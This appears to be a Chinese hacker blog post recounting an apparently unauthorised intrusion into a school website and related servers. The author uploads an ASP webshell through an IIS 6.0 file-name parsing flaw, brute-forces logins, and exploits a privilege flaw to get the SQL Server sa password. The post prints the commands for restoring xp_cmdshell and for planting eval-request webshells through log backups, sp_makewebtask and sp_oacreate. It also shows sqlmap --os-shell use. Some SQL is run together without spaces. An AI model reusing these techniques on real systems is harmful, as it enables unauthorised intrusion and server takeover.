前奏在这里,传送门:渗透纪实之母校官网不谢。

#线索中断

等我放学回家的时候  不好意思  服务器掉了 后门掉了  漏洞补了  导致内网线索断了

没错 断了 就这样断了!

#无奈继续撸旁站内网


N久搞到个后台


第一次见 powereasy 这个版本 由于是iis6.0  随便找个上传不改名的的地方上传类似1.asp;1.jpg之类的文件就能解析

仔细研究了下  在 系统设置-模板标签管理-模板管理 底部上传一个1.asp;1.html的文件就ok-


左边我圈的地方 模板名,我下载个程序研究了下路径,是这样:

根目录/Template/模板名/binghe.asp;binghe.html

这里就是

***.com/Template/海洋之星模板方案/1.asp;1.html

很容易的拿到了shell


很容易的提权


是个内网,转发,然后就没有然后了,给你两张图自己体会



#不能放弃,但何时是个头?

为什么还要拿旁站,因为上次拿下的太卡了 进不去服务器  无法内网渗透

目标:http://www.********.com

先来张图


但是不好意思  这是半年前的菜刀缓存,现在已经掉了,想拿回来进内网

人老了啊,就好忘事 忘了怎么拿的了 主页逛了半天  没发现注入啥的 这个小站你还指望什么xss打管理?几年登陆一次

找到个博客的二级目录

注册个用户进去  没有管理权限  于是乎收集原博客用户 着手爆破


我很心痛 这密码。。。


文件管理各种截断 各种潜规则测试无果 结论 :这个后台并无卵用(大牛可以试试)


接着发现几个都是二级目录先看OA


小菜见识短浅 不曾见过这种  更别说漏洞什么的

学习了乌云大牛的逻辑漏洞,判断出这里确实可以用于爆破用户名,存在的用户名和不存在的用户名 脚本给的response不一样,经测试 admin一定是存在的

用burp枚举密码喽,因为这里没验证嘛,密码判断出是admin,登录试试


嗯? 随便一个密码试试,这样子


什么鬼?密码正确还不给进去  难道。。。可能限制了ip啥的 或者是什么新的技术  小菜惭愧

后来转来转去竟然有越权漏洞

这个


和这个


sa密码出来了  由于是内网 直连不行  试着在sql执行池里执行几个语句 哇擦 没有回显。

执行

[AppleScript]纯文本查看复制代码

?

exec master..xp_cmdshell 'ver'

显示错误


恢复一下xp_cmdshell

[AppleScript]纯文本查看复制代码

?

1

2EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'declare @o int

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

再执行

[AppleScript]纯文本查看复制代码

?

exec master..xp_cmdshell 'ver'

这次不显错了  说明语句已经运行  没有回显而已


在菜刀缓存里面得到网站绝对路径 尝试echo写shell

[AppleScript]纯文本查看复制代码

?

exec master..xp_cmdshell 'echo"123">e:\inetpub\wwwroot\oa\cs\1.asp'

访问无果 什么鬼? 难道管理员上次发现被黑  换了服务器?


来利用他这个执行错误就报错的特性判断目录存在

[AppleScript]纯文本查看复制代码

?

exec master.dbo.xp_subdirs 'e:\binghesec\';//测试一个不存在的目录

果然报错

[AppleScript]纯文本查看复制代码

?

exec master.dbo.xp_subdirs 'e:\inetpub\wwwroot\oa\';//测试原根目录

不报错。。

这我就不明白了 什么鬼??  !!!!

再试试备份法

[AppleScript]纯文本查看复制代码

?

alter database mastersetRECOVERY FULL--

create table cmd(aimage)--

backuplogmastertodisk='c:\cmd1'withinit--

insertintocmd(a)values(0x3C256576616C20726571756573742822612229253E)--

backuplog[northwind]todisk='e:\inetpub\wwwroot\oa\1.asp'--

drop table cmd--

0x3C256576616C20726571756573742822612229253E是hex的<%eval request(“a”)%>

再试试访问1.asp,同样是fuck the dog,404,sa 都搞不定 我也是醉了

以下是mssql存储过程写文件 都没成功

[AppleScript]纯文本查看复制代码

?

1

2

3

4

5

6exec master.dbo.xp_subdirs 'c:\www\';

exec sp_makewebtask 'c:\www\hack.asp','select''<%execute(request("SB"))%>'' '

declare @o int,@f int,@t int,@ret int

exec sp_oacreate 'scripting.filesystemobject',@o out

exec sp_oamethod @o,'createtextfile',@f out,'c:\testing.txt',1

exec @ret=sp_oamethod @f,'writeline',NULL,<>

看来我得放弃这里了

再回到OA,看了半天没什么进展,望着主页发呆,随手习惯性输入‘or’=’or’ , 点登陆竟然没反应 竟然不提示不存在该用户 很明显的注入啦 抓个包 丢sqlmap

sqlmap -r '/tmp/log.txt'


–is-dba返回yes  来–os-shell,结果令我失望


注意看我圈的地方  说明取得不到回显 这对我们获得信息很不利

大牛说在os-shell无回显的情况下,写一个cmd命令  下面这里选n,命令其实已经运行了


执行echo写个shell到根目录 试试访问 也不行

直接cmd不行 那咱来sql-shell自己执行试试 还是不行


百般无奈  退而求其次  跑数据  进后台。

竟然是这样,谁能告诉我为什么sa竟然跑不出数据??


尝试编码 —hex 和—no-cast 也是不行


说到这里  我已经什么都不想说了 给我根绳子吧  结实点的!


#结语

说了这么多就是没搞下!还得多学习!

未完待续,下篇终结 ,有些知识点还是可以看看的哦。


作者:池寒